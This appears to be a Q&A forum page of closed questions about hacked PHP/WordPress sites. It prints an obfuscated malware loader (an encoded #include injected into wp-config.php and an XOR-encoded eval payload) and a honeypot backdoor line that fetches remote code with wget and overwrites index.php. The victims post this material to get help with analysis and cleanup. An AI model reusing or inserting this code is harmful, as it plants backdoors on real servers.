Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 4 days ago.
Improve this question
We have a potential malware attack on our website. The virus is adding #include ("\057home\057admi\156/pub\154ic_h\164ml/w\160-inc\154udes\057bloc\153s/po\163t-na\166igat\151on-l\151nk/.\064fa2e\06172.i\143o"); inside many of the files including wp-config.php and wp-settings.php
We were able to decode the above code, which is as follows
Encrypted
#include ("\057home\057admi\156/pub\154ic_h\164ml/w\160-inc\154udes\057bloc\153s/po\163t-na\166igat\151on-l\151nk/.\064fa2e\06172.i\143o");
Decrypted
#include ("/home/admin/public_html/wp-includes/blocks/post-navigation-link/.4fa2e172.ico");
Then we checked this .4fa2e172.ico file and that file contains encrypted PHP code for malware.
Here is the code:
$_gsnter = basename/*jyzi*/(/*w2t4f*/trim/*62jb8*/(/*9k02*/preg_replace/*7lgut*/(/*l0*/rawurldecode/*l*/(/*m3*/"%2F%5C%28.%2A%24%2F"/*48a*/)/*q*/, '', __FILE__/*1*/)/*8y1h*//*hkmzn*/)/*u8qf*//*hwfai*/)/*de*/;$_76w3qoy = "GRFI%13%01TQ%5B%40%0C%07G%09G%12%13W%04%5ChQA%07%17%0AV%409%02%40%00PCW%0ENJF%24Ol%05W%03XYW%06N%10%1B%5CQ%07%0Cm%06%5EYFK%11%170MF%03%00F%00%11%10%1E%0EXJT%24t%0F%0F%5B%3ABRF%06N%06%1D%5C%5B%14%3E%5E%0AV%10%1E%0E%276%23b%1D%5D%21%5B%0BXhAK%1DKHB%5B%01%3EW%17CX%40%5DNOO%1E%1D%5D%21%5B%0BXhAK%1DKHCU%1E%3EW%1DTTGZ%00%0C%01q%40%0F%0CWB%1D%17%02%07R%23%0A%5CF%09%13m%17TG%5D%5C%1D%0A%01I%1CVH%09%25BRFq%1D%0A%02Kk%0A%08_%0CE%1F%02%07R%0A%09%06%15%02%04T%0C_RV%06K3%27~k%23.~G%18%1EIJ%0C%05%06%40QNCb-ahwa%25AC%0E%16%3A%0F%10L%0AJ%5BHIKNJQ%00%08%5C%00U%1F%15H%00%0F%0AqD%13%15m%06%5EYFK%07%17%1C%0E%13OHI%01TQ%5B%40%0CKHH%5D%0A%04m%15DCmM%06%0D%1BKZ%12%12%12B%1D%17%03%07RG%1F%5BD%0A%19K%09%11%0A%12%09PS%0CM%07%05%03%0BH%03%0E%05%19DWV%1BPKY%0BV%04%1A%03M%0AQX%1CW%05%03W%5C%00%10%09I%05%0C%0DOXFEB%10A%5BJW%05X%09%5BZ%05%15%5B%0A_%17G%5B%1A%11%16AY%03I%16%09ACXW%00JOU%5D%00A%1A%16EE%5EK%07KKBD%12%0BK%0C%18%17%0E%0E%5DJ%14%5CQ%12%14%40%0B%11%15%10%15%14G%17%5DN%03%17B%03%11%0A%12%0C%28%21%2Cjq%20%26z%2C%7B%7C~c%27%2C%3F%7Ff55g3fokt%08%01%0CJQ%00%06Z%0C%5B%5C%5EC%07%0C%1F_F%15%15G%13FOKTYR%5D%1D%00SW%05%5D%08%1C%1D%13KXKYU%0E%12%5D%02SG%12%13I%10%1B%5Ck%15%11%5E%0CE%1F%16V%1A%19%0AXD%00H%09AFVZ%5D%06%04%0D%5E%14%5BAS%17CVKq%0F%0F%06%5E%1CB%16S%0DBXUL%19JT%0AN%07%0D%5C%07CNF%0ETC_%15%10%11%03P%12EYEJI%5EO%0C%16%5DE%5E%15E%5DKGI%5EO%5EF%03%06m%17TG%5EO%0A%06G%0CJ%3D%3FsHkV%1FTYNVr%1F%3ANnXlI%10%02IAM%02%14B%0DB%11%5BN%5B%07R%07%00%0EOB%14Z%08FUPLI%5EO%0AC%07%09A%0AVUBuM%0F%1FZ%5E%1F%08iAKV%5E%40%0B%11%16Z%1FM%3Co%5E%15NEF%18%16%0BT%14%5BA%16%12P_AA%0E%01%1Fu%10%0A%11F%0FH%5Ei%0A%13%02%03%40V%14%18FN%1Ajo%15M%06%1F%5EV%00%04YE%0C%17%16Y%08%0B%1CAS%04%11iA%5DGFD%10%0A4%0AN%07%0D%5C%07CNF%05B%3E2%15%10%1C%00%5E%0BSEKZ%19%0D%05BW%07A%0FE%15%40SF%1A%0C%08LD%3DE%5E%15E%5DKG2G%15OX%08%03%40%1CE%1C%19s4XK_A%04%12U%14ZZ%12%13IKK%5B%5C%0B%16P%07S%17%0E%12IQF%0EHFI%16%1CF_C%5B%0D%19O%10%0AFU%1B%5E%15MSB%07%01%1DW%40%0B%14%40%12FY%12%13IKG%0AM%11%09C%10UM%12%08IRZ%07%14Z%5D%12Q%18%17N%0EAG%0A%5ED%04%07W%0E%11%09%0C%0E%5BJT%0AV%0A%15U%09ZPY%0ETCG%06%10%03%11B%07WRY%0EOC%5C%07%14Z%5D%12S%18%17N%0EM%19%0EBZ%04%13K%11AYXB%0A%02T%0AC%04%03E%11_%40V%0ETCKYV%04%16F%0BFS%12%00I%00%07%5C%1CB%10G%07BPCE%04JTGRFI%16%00AGPH%0C%08O%0F%09FW%06L%11L%16Y%0B%01%18ZZ%11%05%12X%11%13EL%0B%14%1B%40C%02A%1CER_%40%06M%19%0EBZ%04%13K%11%5CB%40Y%1E%0DF%15I%0F%07%12M%15MSB%07%01%1DW%40%16%0FX%09RV%12%0FTCY%1A%1DF%1A%16%12SUEZ%07%14%0B%0E%09FEE%07S%40F%40%1E%07O%00%14%05%09%40M%15U%5EZ%0E%0F%04I_OZO%18%11%40ZG%05%06O%06%10%1C%00%5E%0BSEKZI_O%5D%40%14%0DW%0B%19%13%5E%5E%1D%09%16G%1DOZ%40%00EB%40%40IG%18LV%11%15%5C%12U%0COG%0FCG%0FR%13%0FQ%11XX%5Cq%0C%1B%06%5D%40%15I%15%03X%5BWq%19%16%1BqW%09%0FF%00_CA%09%40J%14HA%08%02F%0C%5EY%12H%00%0F%0AqD%13%15m%06%5EYFK%07%17%1C%06%10%01%00T%11B%5E_DECKTR%0B%11Q%00E%1B%12%0A%08%06%1AY%5D%1C%18BE%0C%17tO%05%10%0A%07OB%14G%09K%5DA%5EI%5EO%0AU%03%14E%0CKNB%0ET%5EO%16%14YA%15%04%16%17%08%0EN%14H%15%10%09%0DH%13PN_%0ETC%2FH%5B%16%04%5CM%15PSH%1D%10%06C%5EJA%16%10D%5BHD%1A%13F%15%5D%00A%1AA%5E%5BHX%08%1A%02%0E%09%5B%5C%12%23P%5BAK%40%18%1DK%40%13%13%5CE%01%0COK%05%10%0AU%5D%00A%1A%0CBhS%5C%1B%02%16%06%10%1C%07_%15RRF%07%40CKTR%0B%11Q%00E%17%0F%0E%00%0E%1FB%5B%02%04%1AAKQ_%5E%0A%06%1B%07%0FB%0A%5D%15%5D%5DY%0ETC%09YF%0F%15WM%15X%5ET%1F%02%16C%18FEH%03%5CGQK%1DJTHW%0A%0EA%00%19%13%5DB%13%15%0EWYOZ%40%00EB%40%40IG%04AD%0A%0BY%5ELJOG%0FCG%0FR%13%0FQ%11XX%5Cq%0C%1B%06%5D%40%15I%15%03X%5BWq%0E%06%1BqW%09%0FF%00_CA%09%40J%14HA%08%02F%0C%5EY%12H%00%0F%0AqS%03%15m%06%5EYFK%07%17%1C%06%10%15%0CB%10XT%5B%07%12G%07AX%0C%04%5EE%0C%17TA%19%06%01%06%10%15%0CB%10XT%5B%02IA%1D%0C%1D%5DE_%03BZGW%0D%08O%13%14%00%13W%04U%1F%16F%06%0F%05KXJAT%0C%5DRAG%13%06G%0AG%0B%11G%0CR%5E%1B%07R%05%0CB%5B%15%04%1AAYX%5ED%0C%0FF%15F%03%15G%17_%17%16C%0F%10%02%5BM%02%0A%09%18LQG%40%0A%17%06AZF%0ES%13SBX%06%40%18%1DK%40%13%13%5CEEE%5BCA%13%1DKS9%13W%15%5DVQKAA%40r%1CHKnA%1E%15%1E%0ENDC%0Ek9%27%7B%29thm%07%40X%12HA%08%02F%0C%5EY%12%5D%1F%0E%18VP%08%17%1AA%40G%5EX%07%0A%0CO%18FE%5D%09KASW%04%13%07GL%12%17BLJ%13JK%06%0A%1BO%14%5BA%10G%0AQ%5D%5CIKKTU%0A%0FP%17HC%0F%1ERCKTU%0A%0FP%17HC%0E%5D%1D%11%03KZNEC%15%5DA%5CG%0A%02F%15%1D%1D%07%5D%17%11%1F%16I%1F%0D%01CY%15%12%0FU%0A%17%16I%1F%0D%01CY%15%12%0E%16EE%5EK%07KKAX%1C%17S%1C%5CGZG%11%17%19%5E%1DFG%14E%15MSB%07%01%1DW%40Z%12F%17%5DR%5C%06M%12%1FBB%08%08Q%04%18%0C%12%0A%0E%15%01%40Y%0B%12AN%1A%1B%12%0A%13%02%03%40V%14%18FN%1A%1EI%0A%11%06%00G%40%07A%1CX%11TZ%5CA%0C%1DJ%1CB%10B%09GY%5BM%088KTU%0A%0FP%17HCo%07I%3DOAF%02I%16%0A%5DMDO%10%0E%1FF%5D%1E%15D%15j%13UX%07%0D%02CG%15%3C%1BL%0AJO%5C%0C%17%1A%5CZFEJ%00%5E%5EFOR%1E%09%5BZ%05%15%5B%0A_%17%5DC%11%01%03K%1CB%10B%09GY%5BM%08OO%0A%5B%0A%1BD%04HZBF%00%1B%1BXDO%1AU%09%5EUSBIG%1F%5BD%0A%19K%09%0AEWZ%1C%11%01%0EG%10%0CE%1DUYD%06%1A%15%02YL%02%0FDM%15FBB%1F%0D%06MUJA%16%0A%5DMDO%10%0E%1FF%5D%1E%15D%15%18%1B%12%0A%19%16%1FBL%1F%0D%1B%5ELQG%40%0A%17%06AZF%0DG%12EVJ%40%10KK_D%0A%17%5C%0CRV%1E%0EM%0C%03TB%07%18_%15Y%5EJZ%1F%13FUS%0A%0EP%04%5D%17%16%5E%1C%13%03VM%0AZ%40%00EB%40%40I%10%19CC%1E%05%5C%13%19DDC%1E%1B%0B%40BNEC%15%5DA%5CG%0A%02C%0E%10%16%14B%09IN%5E%07ECKAX%1C%17S%1C%5CGZG%11%17%19%5E%1D%5D%1CT%10_TFG%06%0DOY%5B%16%00H%11_%1F%1BUM%01%07MB%05%10CE%0C%17rH%00%0F%0AqS%03%15m%06%5EYFK%07%17%1C%06%5B%07%17P%10%5B%1F%1B%07RG%1DVN%11%03G%14%11%0A%12%5D%1D%11%1FAGNEP%0DRAQ_%18OOCPSI%5D%04GUGDAJF%07%0F%0F%07%12M%15EJT%1E%01%1A_%14G%5C%0FEwv~%7D%2CJ%14%0AG%0D%06V%11F%17%0F%0E%1A%16%0D%5D%40%14I%16%07YTDM%18%12C%0E%10%14%19H%12SBC%0EBC%5C%1C%1D%5DEE%1FCF%5BO%10%00O%13%14%26%14%5C%16TE%5BO%05%0A%15K%1C%09%0CJ%07%5DR%1A%5C%08%14%1A%5CX%02%04Q%0AUR%1A%0A%1A%08%08J%40%11H%1EE%5CS%07%06%06%02%19LA%0CI%1BL%18%1E%09S%0C%0F%1CKOB%16H%17%40%5ESW%0ACR%0Eu%14%13S%1C%19%1E%09S%1B%06%1B%5BF%08A%16%12KECG%08%1A%0C%15I%00%14%5C%06E%5E%5D%40I%16%02%5B%5E%02%0DXM%15%40H%5C%18%0A%0EWWO%1A%16%12GVWV%04%12O%13%14%14%00E%10C%5BW%40%0A%0C%0BK%1C%0A%14E%11PO%5CWA%23%1CKF%0F%00%5E%0CKR%1A%0A%1E%19%1D_%5D%07%18QL%1D%17_J%5CK%00OB%04%14XM%18%1E%1B%07RG%0DFW%10%02C%14%11%0A%12n%0F%0A%03Kk%01%04F%3ARX%5CZ%0C%0D%1B%5D%1C%09%00D%07D%5D%1A%07%40XK%5CL%1C%16P%10%40%17%0F%0E%1A%17%1D%5E%5B%15I%16%07YTDM%18%12C%0EY%02T%1A%0APAP%5B%03KF%07%1D%5D%08TE%19%13%40V%13%14%0D%5BEF%40%0FX%11qsb%3A%26FU%10%0E%17%5C%17FME%0ETC%1C%5BV%15%15%40M%15UZM%1F%00%1E_%18FE%40%1DK%40P%5B%18CD%0E%07TH%09AS_QX%0A%12%1E%0E%09F%12F%17nEW%5E%05%02%0CK%1CB%09D%0BC%40HYECKYB%07%04J%08%40%1B%12%0A%0B%0B%0CXW%17%10%1B%5ELR%5E%5D%0C%18KL%5C%05%17Q%14%40%17%0F%0EM%01%07MB%05%10CE%1F%17%10r%07%3F%01%01%1BDA%1CE%5CS%07%06%06%02%19LA%0CI%1BL%11%19%12%0A%1E%15%0EKL%0B%10%09%18qQ%5BB%0C%3C%1F%5B%409%02%5D%0BER%5CZ%1AK%00OB%04%14XM%18%1B%12%0A%0B%0B%0CXW%17%10%1B%5ELQG%40%0A%17%06AZF%0E%5E%0FIPF%06M%1B%09KG%15%0AFI%11%13J%40%05%1A%04%5C%1D%1DEE%1FCF%5BO%10%00O%13%14%11%0EB%04KC%5C%06%40XKYN%14%10%5B%04HTi%0A%11%05%0A%5DG%0D%15oE%0C%17G%5B%1A%11%16AY%03I%16%1D_%5BKE%1BJT%5BY%13%0BV%09%5B%1F%16Y%13%11%1EGU%1F%02%1B%5ELQG%40%0A%17%06AZF%11H%0EIDDJAG%17HQ%15%12Y%11%18L%16Y%13%11%1EGU%1F%02%12X%11%40%5D%5E%08%19%1B%40%1COZG%0BBRF%06M%14%15%5CE%0F%00K%06j%13JH%0C%10%1CE%40%3BH%09%10%5CBXJ%05%09G%0AC%1C%13C%0CPNQ%07R%1E%09%5BZ%05%15%5B%0A_%17AJ%19%05%1F%5EP%0EI%16%1DWRA%5D%02%17R%60a%2A-%1B%1EWX%40K%08%00%07%0E%1C%11%0EB%04KC%5C%06%40C%0E%5D%14B%06D%0B_Z_%5D%1A%0C%08%5BG%02%5C%0CAK%5EKD%0C%06FU%5D%00A%1AAIQW%5D%1A%08%1B%07O%0F%07%12MBC%40M%04%13G%0AL%00%04A%16ZC%1E%0EM%04%19%40Z%0B%0CA%16%5EPG%5D%0DJO%13%09FQ%1B%1ETASBAG%15GM%0C%04WL%0AU%40K%08%08TSI%03%0DA%00JRDO%05KKT%5D%1F%0BW%00%18%0COS%14%05%00%5CQ%07%02ZE%19V%40%5C%08%1A0CQ%14%06WM%15hqa%26%28%26k%18FEm5~df%07I%02%1C%0E%10%09%0CB%1D%5BM%12%13WCK_D%0A%17%5C%0CRV%1BUM%12%1FBB%08%08Q%04%11%0A%12n%1C%0D%1CKF%0F%00%5E%0CKR%1AA%04%1B%0DBQN%14G%16CN%5DC%0CKK_D%0A%17%5C%0CRV%1B%02IG%00CD%1E%0BHL%18%0C%5BHIK%06%5DG%03%15%1AA%40G%5EX%07%0A%0COoA%00YBl%1E%12%08OCK%5EA%16%0DJ%1C%5D%0A%0F%0A%18%13%03XZ%0F%02S%3E%16VY%094J%14GRFI%16%14A%5BD%40%00%00%0Eu%13%07FoE%0C%0A%12%09%00DFU%10%1C%00%5E%0BSEKZI%5EOoF%14%00KM%16GD%09I%5EQ%0Et%16%09B%13TEAG%06%0DG%07%18A%12DB%11%0A%0C%0ENQA%1E%19WF%1EBP%5C%15%0ET%5DO%0AE%16%0DD%0BXTSuN%02%04%09iJH%09%00R_%5D%0E%29%10%0A%5C%5D%07%0D%5B%1FT%1F%16T%08%0F%01LF%1F%15%1B%5ETO%5BZR%1E%0ABG%03%08TE%19%13C%5E%05%15%01GW%07%3A%15%04%16j%12%13TCHK%13O%1AW%13P%5B%1A%0A%18%13%03XZ%0F%02S%3E%16S%15s%40X%12KX%15%04%5B%03%11%1F%16_%19%0F%19%40%5D%05%00iBP%10o%0ET%5EO%09D%0A%14U%0C_%10%1BU%00%05G%0AE%16%0DD%0BXTSuN%10%0E%09iF%5C%0FE%16VVJNJ%14AX%0C%19U%11%19%13C%5E%05%15%01GW%07%3A%15%15%16j%1E%0EM%12%1FBB%08%08Q%04j%10V%094JTSQ%0A%12W%0CW%1F%16_%19%0F%19%40%5D%05%00iBBV%15sI%5ER%0E%13%14%04_B%18LBT%02%1B%1CXPNEC%15%5DA%5CG%0A%024%09DA%3C%1B%5ELJWM%01%0CO%0AE%16%0DD%0BXTSuN%02%04%09i%5D%04J%0CE%1F%1B%15%14%1E%1CJD%00%11B%01Y%1F%1B%15%14i%12";eval/*k6e7*/(/*z7ir*//*em3a*/(/*ue2lb*/rawurldecode/*pc*/(/*39vut*/$_76w3qoy/*9d0j3*/)/*7fnb*/ ^ substr/*w3qy*/(/*bor*/str_repeat/*s1qg*/(/*o24w*/$_gsnter, /*61m*/(/*rza52*/strlen/*xv*/(/*u*/$_76w3qoy/*xyi*/)/*k5v*//strlen/*jp*/(/*h7g*/$_gsnter/*v28a*/)/*jo*//*t3hn*/)/*e*/ + 1/*y3wp*/)/*di6fn*/, 0, strlen/*2*/(/*6*/$_76w3qoy/*njcet*/)/*4qrm*//*3*/)/*3j*//*j9tdu*/)/*a5v*//*f3w*/)/*atbej*/;
Kindly help us decode this code so we can clean our sites and possibly remove the backdoor as well.
Thank you!
We have tried decoding the above two codes, we were successful in decoding the first one. We have scanner our site with different server and WordPress scanners including CXS Scan, Virus Scanner (cPanel), WordFence, Sucuri, etc.
Related
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 2 years ago.
Improve this question
After I finished setting up TLS with let's encrypt.
my site under WordPress is only displayed in ugly HTML.
my architecture is the following:
(reverse proxy) => (nat box)=>(reverse proxy2)=>(web server)
I obviously changed the WordPress configuration for https.
Do you have any idea where this might be coming from?
You could try https://wordpress.org/plugins/wp-letsencrypt-ssl/#description. The plugin could force SSL/HTTPS, fixing insecure content & mixed content issues easily.
Access your site via browser and check the console. You will probably see resources (probably your css) that are being prevented to load because they are 'http' requests in a 'https' connection.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 6 years ago.
Improve this question
I want to make sure visitors to my site can't see the PHP code that's generating the page. Here is a reference: http://may.edu.np/tmp/
Can anyone explain to me how server-side scripts are interpreted and how the result is delivered to the end user?
If I understand your question correctly, no one should be able to access your source code so long as they don't have access to the server. When a browser makes a request for a .php file to the server, the server knows that it must first interpret the script and then send the output from your echo statements and/or inline HTML. As far as I know, there's no way for the user to "trick" the server into sending it as plain text, so I wouldn't worry about that. Also, as long as you disable error reporting, no one should even know you're running php, as there's no ".php" in the URL. Hope this helps :)
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
One of my honeypot systems has a pretty interesting PHP shell on it, i've been trying to decode it, but I'm not having any luck getting the contense of the gzinflated b64 encoded part of the script.
Maybe someone with a little more experience with deobfuscating could take a look at it?
Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {#system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
I attempted to deobfucsate it myself by printing variables in different places, but i can't for the life of me get the contents to print out.
Here's my attempt at making it a little bit more human readable:
http://pastebin.com/BRbyVzyZ
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
My php file online has permission settings 444 - ('readable' for everyone)
When I open the file in Firefox, it correctly only shows the output of the file (meaning things that are echoed or printed)
I want people to NOT EVER see the inside of the php file because it shows sensitive information. So - are there some people that are able to look into the inside of the php file?
Unless someone has access to the server then generally no.
There are ways to purposely make the source code visible however.
http://php.net/manual/en/function.show-source.php
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
Please help anyone, This is 4th time for our concern, some one hacking our all websites and replace our index file by their new file.
This time hacked by XcoDerz Security(https://www.facebook.com/Th3CoderzBoat/timeline?ref=page_internal). Please give me the solution to avoid this type of hacking.
Basically they are replacing my index file with their new index file with some of new content.
First of all, change your FTP details. Then check your FTP files for any JS that could be interrogated, or file upload forms? Remove them.
You could try contacting your Web Hosting provider and inform them of what's happening, and supply them with IP addresses if you have them. They may be able to put things in place from their end to block these hackers.